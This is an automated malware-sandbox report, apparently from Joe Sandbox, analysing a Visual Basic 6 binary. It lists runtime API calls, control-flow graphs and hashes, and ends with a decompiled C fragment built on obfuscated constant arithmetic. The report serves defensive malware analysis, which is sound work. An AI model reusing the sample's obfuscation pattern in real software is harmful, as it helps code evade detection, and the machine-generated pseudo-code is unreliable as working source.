                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A751
                                                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A75A
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041A775
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000009C), ref: 0041A79A
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A7A3
                                                                                • __vbaAryLock.MSVBVM60(?,00908598), ref: 0041A7BC
                                                                                • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A7DB
                                                                                • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A7E8
                                                                                • __vbaAryUnlock.MSVBVM60(?,?), ref: 0041A800
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 0041A819
                                                                                • __vbaNew2.MSVBVM60(0040E078,0042A064), ref: 0041A838
                                                                                • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 0041A84B
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,0000000C), ref: 0041A865
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A86E
                                                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0041A8EF), ref: 0041A8DF
                                                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A8E8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$CheckHresult$Move$Error$BoundsGenerate$List$Bool$Copy$New2$#632Ubound$#608System$#516#617AddrefCastConstruct2DestructEraseLockUnlockVar2
                                                                                • String ID: &H1000$&H40$Alignment$ArrowAsKeyTab$AutoHScroll$AutoSelText$AutoVScroll$BackColor$BorderStyle$ButtonBackColor$ButtonStyle$CaseType$ControlType$CustomFormat$Enabled$EnterAsKeyTab$Font$ForeColor$FormatText$MaxLen$Multiline$PasswordChar$ScrollBars$Text$ToolTipText$ValidChar$eXTEditBox1
                                                                                • API String ID: 1849406520-4125845578
                                                                                • Opcode ID: 3bc6dfc64b4e67dec9f3331baed095d0177df28797fd896cbf12892b224acf7a
                                                                                • Instruction ID: 14e9e91084dcc7f14718d377a57e2a393148882e012712f234efa37f7e0d6433
                                                                                • Opcode Fuzzy Hash: 3bc6dfc64b4e67dec9f3331baed095d0177df28797fd896cbf12892b224acf7a
                                                                                • Instruction Fuzzy Hash: 2EE24E70A00309AFDB14DFA4C988EDEBBB8FF48704F108569E549E7291EB749986CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00415D80, Relevance: 188.2, APIs: 105, Strings: 2, Instructions: 932COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 232 415d80-415dd7 234 415dd9-415de5 call 40fb74 __vbaSetSystemError 232->234 235 415de8-415ded 232->235 234->235 237 415def-415dfb call 40fb74 __vbaSetSystemError 235->237 238 415dfe-415e0a 235->238 237->238 241 415e10-415e17 238->241 242 415ea4 238->242 245 415e19-415e1c 241->245 246 415e1e-415e2d 241->246 243 415ea7-415eaa __vbaStrCopy 242->243 247 415eb0-415ec1 __vbaI2I4 243->247 248 415e33-415e87 #525 __vbaStrMove __vbaStrToAnsi call 40f5dc __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 245->248 246->248 250 415ec3-415ecd __vbaI2I4 247->250 251 415eea-415ef5 __vbaI2I4 247->251 257 415e89-415e9b #616 __vbaStrMove 248->257 258 415e9d-415ea2 248->258 253 415ed6-415ee0 __vbaI2I4 250->253 254 415ecf-415ed4 250->254 255 415f20-415f2a __vbaI2I4 251->255 256 415ef7-415f1c __vbaObjSet 251->256 253->251 262 415ee2-415ee5 253->262 261 415ee7 254->261 259 415f7a-415f84 __vbaI2I4 255->259 260 415f2c-415f51 __vbaObjSet 255->260 273 415f65-415f75 __vbaFreeObj 256->273 274 415f1e 256->274 257->247 258->243 263 415fd4-415fde __vbaI2I4 259->263 264 415f86-415fab __vbaObjSet 259->264 260->273 280 415f53-415f5f __vbaHresultCheckObj 260->280 261->251 262->261 266 415fe0-416005 __vbaObjSet 263->266 267 41602b-416035 __vbaI2I4 263->267 284 415fad-415fb9 __vbaHresultCheckObj 264->284 285 415fbf-415fcf __vbaFreeObj 264->285 293 416007-416013 __vbaHresultCheckObj 266->293 294 416019-416029 __vbaFreeObj 266->294 270 416080-416087 267->270 271 416037-41605c __vbaObjSet 267->271 275 416089 270->275 276 41608d-4160a1 270->276 296 416070-416079 __vbaFreeObj 271->296 297 41605e-41606a __vbaHresultCheckObj 271->297 273->270 274->280 275->276 281 4160a7-4160b1 __vbaI2I4 276->281 282 41614d-41615c 276->282 280->273 286 4160b3-4160bb 281->286 287 4160bd-4160c7 __vbaI2I4 281->287 300 416170-416175 282->300 301 41615e-41616a __vbaHresultCheckObj 282->301 284->285 285->270 290 4160e7 286->290 291 4160d3-4160dd __vbaI2I4 287->291 292 4160c9-4160d1 287->292 298 4160ea-4160f9 290->298 291->298 299 4160df-4160e2 291->299 292->290 293->294 294->270 296->270 297->296 308 4160fb-416107 __vbaHresultCheckObj 298->308 309 41610d-416112 298->309 299->290 302 416177-41617a 300->302 303 41617f-41618d __vbaI2I4 300->303 301->300 307 41617c 302->307 304 416198-4161a3 __vbaI2I4 303->304 305 41618f-416195 303->305 310 4161a5-4161ca __vbaObjSet 304->310 311 4161ec-4161f6 __vbaI2I4 304->311 305->304 307->303 308->309 312 416114-416119 309->312 313 41611c-41612b 309->313 327 4161cc-4161d8 __vbaHresultCheckObj 310->327 328 4161de-4161e7 __vbaFreeObj 310->328 314 4162fc-416306 __vbaI2I4 311->314 315 4161fc-416223 __vbaObjSet 311->315 312->313 322 41612d-416139 __vbaHresultCheckObj 313->322 323 41613f-416144 313->323 316 41630c-416333 __vbaObjSet 314->316 317 41647e-4164a5 __vbaObjSet 314->317 330 416225-416231 __vbaHresultCheckObj 315->330 331 416237-416289 call 41006c __vbaSetSystemError __vbaFreeObj __vbaObjSet 315->331 337 416335-416341 __vbaHresultCheckObj 316->337 338 416347-416399 call 41006c __vbaSetSystemError __vbaFreeObj __vbaObjSet 316->338 335 4164a7-4164b3 __vbaHresultCheckObj 317->335 336 4164b9-41650b call 41006c __vbaSetSystemError __vbaFreeObj __vbaObjSet 317->336 322->323 323->303 326 416146-41614b 323->326 326->307 327->328 328->317 330->331 349 41628b-416297 __vbaHresultCheckObj 331->349 350 41629d-4162a4 331->350 335->336 356 41650d-416519 __vbaHresultCheckObj 336->356 357 41651f-416526 336->357 337->338 352 41639b-4163a7 __vbaHresultCheckObj 338->352 353 4163ad-4163b4 338->353 349->350 354 4162b6-4162ca 350->354 355 4162a6-4162b0 __vbaNew2 350->355 352->353 358 4163c6-4163da 353->358 359 4163b6-4163c0 __vbaNew2 353->359 365 4162db-4162f1 354->365 366 4162cc-4162d5 __vbaHresultCheckObj 354->366 355->354 356->357 360 416538-41654c 357->360 361 416528-416532 __vbaNew2 357->361 369 4163eb-416401 358->369 370 4163dc-4163e5 __vbaHresultCheckObj 358->370 359->358 367 41655d-416573 360->367 368 41654e-416557 __vbaHresultCheckObj 360->368 361->360 372 416415-41647b __vbaStrToAnsi call 40fb2c __vbaSetSystemError __vbaFreeStr __vbaFreeObjList 365->372 373 4162f7 365->373 366->365 377 416575-416581 __vbaHresultCheckObj 367->377 378 416587-4165f6 __vbaStrToAnsi call 40fb2c __vbaSetSystemError __vbaFreeStr __vbaFreeObjList 367->378 368->367 369->372 376 416403-41640f __vbaHresultCheckObj 369->376 370->369 372->317 373->376 376->372 377->378 383 416752 378->383 384 4165fc-416625 __vbaObjSet 378->384 385 416758-41677a __vbaObjSet 383->385 390 416627-416633 __vbaHresultCheckObj 384->390 391 416639-416673 __vbaCastObj __vbaObjSet __vbaFreeObjList 384->391 392 41678b-4167a1 385->392 393 41677c-416785 __vbaHresultCheckObj 385->393 390->391 395 416675-416681 __vbaHresultCheckObj 391->395 396 416687-4166a7 call 40f5dc __vbaSetSystemError 391->396 399 4167a3-4167af __vbaHresultCheckObj 392->399 400 4167b5-4167ec __vbaFreeObjList __vbaObjSet 392->400 393->392 395->396 403 4166a9-4166bd call 40f5dc __vbaSetSystemError 396->403 404 4166bf-416700 __vbaStrToAnsi call 40f5dc __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr __vbaLenBstr 396->404 399->400 410 4167fd-416813 400->410 411 4167ee-4167f7 __vbaHresultCheckObj 400->411 403->404 412 416702-416724 #516 404->412 413 416726-41673b 404->413 418 416815-416821 __vbaHresultCheckObj 410->418 419 416827-41686c __vbaFreeObjList __vbaFreeObj __vbaFreeStr 410->419 411->410 414 41673c-416749 call 40f5dc __vbaSetSystemError call 40fbb8 412->414 413->414 422 41674e-416750 ShowWindow 414->422 418->419 422->385
                                                                                APIs
                                                                                • __vbaSetSystemError.MSVBVM60(?), ref: 00415DDF
                                                                                • __vbaSetSystemError.MSVBVM60(?), ref: 00415DF5
                                                                                • #525.MSVBVM60(?), ref: 00415E34
                                                                                • __vbaStrMove.MSVBVM60 ref: 00415E45
                                                                                • __vbaStrToAnsi.MSVBVM60(?,?), ref: 00415E4F
                                                                                • __vbaSetSystemError.MSVBVM60(?,0000000D,?,00000000), ref: 00415E65
                                                                                • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415E73
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00415E7F
                                                                                • #616.MSVBVM60(?,?), ref: 00415E8E
                                                                                • __vbaStrMove.MSVBVM60 ref: 00415E99
                                                                                • __vbaStrCopy.MSVBVM60 ref: 00415EAA
                                                                                • __vbaI2I4.MSVBVM60 ref: 00415EBC
                                                                                • __vbaI2I4.MSVBVM60 ref: 00415EC8
                                                                                • __vbaI2I4.MSVBVM60 ref: 00415EDB
                                                                                • __vbaI2I4.MSVBVM60 ref: 00415EF0
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415F05
                                                                                • __vbaI2I4.MSVBVM60 ref: 00415F25
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415F3A
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000016C), ref: 00415F5F
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00415F68
                                                                                • __vbaI2I4.MSVBVM60 ref: 00415F7F
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415F94
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000016C), ref: 00415FB9
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00415FC2
                                                                                • __vbaI2I4.MSVBVM60 ref: 00415FD9
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00415FEE
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000016C), ref: 00416013
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041601C
                                                                                • __vbaI2I4.MSVBVM60 ref: 00416030
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416045
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000016C), ref: 0041606A
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00416073
                                                                                • __vbaI2I4.MSVBVM60 ref: 004160AC
                                                                                • __vbaI2I4.MSVBVM60 ref: 004160C2
                                                                                • __vbaI2I4.MSVBVM60 ref: 004160D8
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040F460,000007E0), ref: 00416107
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040F460,000007E8), ref: 00416139
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040F460,000007E0), ref: 0041616A
                                                                                • __vbaI2I4.MSVBVM60 ref: 00416188
                                                                                • __vbaI2I4.MSVBVM60 ref: 0041619E
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004161B3
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,0000009C), ref: 004161D8
                                                                                • __vbaFreeObj.MSVBVM60 ref: 004161E1
                                                                                • __vbaI2I4.MSVBVM60 ref: 004161F1
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041620A
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 00416231
                                                                                • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041624A
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041625C
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416270
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 00416297
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 004162B0
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000014), ref: 004162D5
                                                                                • __vbaI2I4.MSVBVM60 ref: 00416301
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041631A
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 00416341
                                                                                • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041635A
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041636C
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416380
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 004163A7
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 004163C0
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000014), ref: 004163E5
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104E8,00000100), ref: 0041640F
                                                                                • __vbaStrToAnsi.MSVBVM60(?,Button,00000000,5000000B,?,?,?,?,?,00000000,?,00000000), ref: 00416449
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00416459
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00416465
                                                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00416475
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041648C
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 004164B3
                                                                                • __vbaSetSystemError.MSVBVM60(?,?), ref: 004164CC
                                                                                • __vbaFreeObj.MSVBVM60 ref: 004164DE
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004164F2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0), ref: 00416519
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 00416532
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000014), ref: 00416557
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104E8,00000100), ref: 00416581
                                                                                • __vbaStrToAnsi.MSVBVM60(?,Edit,00000000,54010000,?,00000000,?,?,?,00000000,?,00000000), ref: 004165BA
                                                                                • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 004165CC
                                                                                • __vbaFreeStr.MSVBVM60 ref: 004165D8
                                                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004165E8
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416610
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000210), ref: 00416633
                                                                                • __vbaCastObj.MSVBVM60(?,00410468), ref: 00416642
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041664D
                                                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00416659
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410468,0000004C), ref: 00416681
                                                                                • __vbaSetSystemError.MSVBVM60(?,00000030,?,00000001), ref: 0041669E
                                                                                • __vbaSetSystemError.MSVBVM60(?,000000C5,?,00000000), ref: 004166BD
                                                                                • __vbaStrToAnsi.MSVBVM60(?,?), ref: 004166C7
                                                                                • __vbaSetSystemError.MSVBVM60(?,0000000C,00000000,00000000), ref: 004166DB
                                                                                • __vbaStrToUnicode.MSVBVM60(?,?), ref: 004166E5
                                                                                • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004166EE
                                                                                • __vbaLenBstr.MSVBVM60(?), ref: 004166F8
                                                                                • #516.MSVBVM60(?), ref: 00416706
                                                                                • __vbaSetSystemError.MSVBVM60(?,000000CC,00000000,?), ref: 00416741
                                                                                • ShowWindow.USER32(?,00000005), ref: 0041674E
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00416766
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004104F8,00000040), ref: 00416785
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,000001C0), ref: 004167AF
                                                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004167C5
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004167D8
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004104F8,00000040), ref: 004167F7
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,000001C0), ref: 00416821
                                                                                • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00416831
                                                                                • __vbaFreeObj.MSVBVM60(0041686D), ref: 0041685D
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00416866
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresult$Free$ErrorSystem$List$Ansi$New2$MoveUnicode$#516#525#616BstrCastCopyShowWindow
                                                                                • String ID: Button$Edit
                                                                                • API String ID: 47084911-194258807
                                                                                • Opcode ID: f82bf783298826b457ba641c5b1a280949302d1d19247fe771af235a0b4fd448
                                                                                • Instruction ID: c2fe4f57df809c9c010dc1cdbf862f63a0087c7c8e9a089793c4f6b94b841b24
                                                                                • Opcode Fuzzy Hash: f82bf783298826b457ba641c5b1a280949302d1d19247fe771af235a0b4fd448
                                                                                • Instruction Fuzzy Hash: F0725E70A00604AFD7149BA4DD48FEFB7B8FF48705F104529F646E72A1DB74A886CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004229F0, Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 255COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004240C0: __vbaVarVargNofree.MSVBVM60(?,?,00424414,?), ref: 004240D3
                                                                                  • Part of subcall function 004240C0: __vbaI4Var.MSVBVM60(00000000,?,?,00424414,?), ref: 004240DA
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000019,72A0C33A), ref: 00422AB1
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00422B12
                                                                                • __vbaVarTstEq.MSVBVM60(?,?,00001BBC), ref: 00422B78
                                                                                • __vbaI2Var.MSVBVM60(?), ref: 00422B87
                                                                                • __vbaStrMove.MSVBVM60(00000000), ref: 00422B98
                                                                                • __vbaVarTstEq.MSVBVM60(00008002,?), ref: 00422BBF
                                                                                • __vbaSetSystemError.MSVBVM60(?), ref: 00422BFE
                                                                                • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00001C1F), ref: 00422C3C
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00422CEC
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,?,00000004), ref: 00422D14
                                                                                • __vbaCheckTypeVar.MSVBVM60(?,00411A18), ref: 00422D1F
                                                                                • __vbaVarLateMemCallLd.MSVBVM60(?,?,hwnd,00000000), ref: 00422D3C
                                                                                • __vbaI4Var.MSVBVM60(?,00000001,?), ref: 00422D62
                                                                                • __vbaI4Var.MSVBVM60(?,00000000), ref: 00422D6C
                                                                                • __vbaSetSystemError.MSVBVM60(00000000), ref: 00422D7A
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00422D88
                                                                                • __vbaVarMove.MSVBVM60 ref: 00422DB9
                                                                                • __vbaSetSystemError.MSVBVM60(-00000004,?,00000001), ref: 00422DDD
                                                                                • __vbaFreeVar.MSVBVM60(00422E30), ref: 00422E10
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00422E15
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00422E1A
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00422E1F
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00422E28
                                                                                • __vbaErrorOverflow.MSVBVM60(?,?,?,00000019,72A0C33A), ref: 00422E47
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$Error$System$List$Move$CallCheckLateNofreeOverflowTypeVarg
                                                                                • String ID: hwnd
                                                                                • API String ID: 2059686369-1070177613
                                                                                • Opcode ID: 2f492016b26e4457f4250573f2c6ec222418582bb05ae5cdf28aff983abd056d
                                                                                • Instruction ID: 23fcae3a1f162950d6ace3d42bd84e4bbed8cba36ac589c416da33b1d5dbda45
                                                                                • Opcode Fuzzy Hash: 2f492016b26e4457f4250573f2c6ec222418582bb05ae5cdf28aff983abd056d
                                                                                • Instruction Fuzzy Hash: 22A15DB0E00229ABDB20DF65DD45BDDB7B8BF44344F4085AAE409B7250DBB85A88CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422660, Relevance: 19.6, APIs: 13, Instructions: 112COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00401D25,00000000,?,00401610,?), ref: 004226B4
                                                                                • __vbaAryLock.MSVBVM60(?,00000000), ref: 004226C7
                                                                                • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401D26), ref: 004226EF
                                                                                • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401D26), ref: 004226FC
                                                                                • __vbaAryLock.MSVBVM60(?,?), ref: 00422709
                                                                                • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401D26), ref: 00422728
                                                                                • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401D26), ref: 00422731
                                                                                • __vbaSetSystemError.MSVBVM60(?,?,00401D26), ref: 00422751
                                                                                • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00422761
                                                                                • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00422767
                                                                                • __vbaAryMove.MSVBVM60(?,?), ref: 00422771
                                                                                • __vbaAryDestruct.MSVBVM60(00000000,?,004227B0), ref: 004227A9
                                                                                • __vbaErrorOverflow.MSVBVM60(00000000,?,00401610,?,?,?,?,?,?,?,?,00000000,00401D26,?), ref: 004227C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructMoveOverflowRedimSystem
                                                                                • String ID:
                                                                                • API String ID: 1650229119-0
                                                                                • Opcode ID: a4d49285ffdaf3bf251c925da12021fbf1b2636bc16d54831f22787ec9c3e71c
                                                                                • Instruction ID: 5bcb73a249b99ed0406a2e9b3568af4946de10a5941a691269fdbdf231264a20
                                                                                • Opcode Fuzzy Hash: a4d49285ffdaf3bf251c925da12021fbf1b2636bc16d54831f22787ec9c3e71c
                                                                                • Instruction Fuzzy Hash: C0414F75A00218AFCF04DF94DE85EAEF7B9FF88700F50415AE901B7250D7B5A941CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 603 7a8400-7a84df 604 7a84e3-7a84e9 603->604 605 7a85c8-7a85ce 604->605 606 7a84ef 604->606 607 7a8630-7a8637 605->607 608 7a85d0-7a85d6 605->608 609 7a866c-7a86b4 call 7ab6e0 606->609 610 7a84f5-7a84fb 606->610 611 7a8639-7a864f call 7a3f00 call 7a3e60 607->611 612 7a8654-7a8667 607->612 613 7a85d8-7a85e0 608->613 614 7a85b1-7a85b7 608->614 619 7a85bd-7a85c7 609->619 633 7a86ba 609->633 615 7a854a-7a8551 610->615 616 7a84fd-7a8503 610->616 611->612 612->604 622 7a85e2-7a85fa call 7a3f00 call 7a3e60 613->622 623 7a8600-7a8624 CreateFileW 613->623 614->604 614->619 620 7a856e-7a8591 615->620 621 7a8553-7a8569 call 7a3f00 call 7a3e60 615->621 624 7a8543-7a8548 616->624 625 7a8505-7a850b 616->625 642 7a85ae 620->642 643 7a8593-7a85a9 call 7a3f00 call 7a3e60 620->643 621->620 622->623 623->619 627 7a8626-7a862b 623->627 624->604 625->614 632 7a8511-7a8518 625->632 627->604 639 7a851a-7a8530 call 7a3f00 call 7a3e60 632->639 640 7a8535-7a8541 632->640 634 7a86bc-7a86be 633->634 635 7a86c4-7a86d1 633->635 634->619 634->635 639->640 640->604 642->614 643->642
                                                                                C-Code - Quality: 66%
                                                                                			E007A8400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
